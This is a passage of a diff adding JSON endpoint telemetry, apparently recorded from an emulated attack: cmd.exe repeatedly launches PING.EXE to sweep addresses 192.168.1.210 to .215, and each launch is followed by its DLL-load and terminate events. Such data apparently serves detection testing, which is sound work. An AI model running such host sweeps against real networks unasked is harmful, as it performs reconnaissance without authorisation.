"{42FC7E13-CBB5-5C05-0000-0010A1985301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": 
"{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "process", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573016830000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.210", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5616, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "process", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573021830000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.211", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6068, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "process", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573026990000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.212", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5044, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5044, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "process", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573031830000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.213", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3148, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "process", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573036990000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.214", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6784, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573037130000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "process", + 
"pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573041830000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.215", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5856, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + 
"unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": 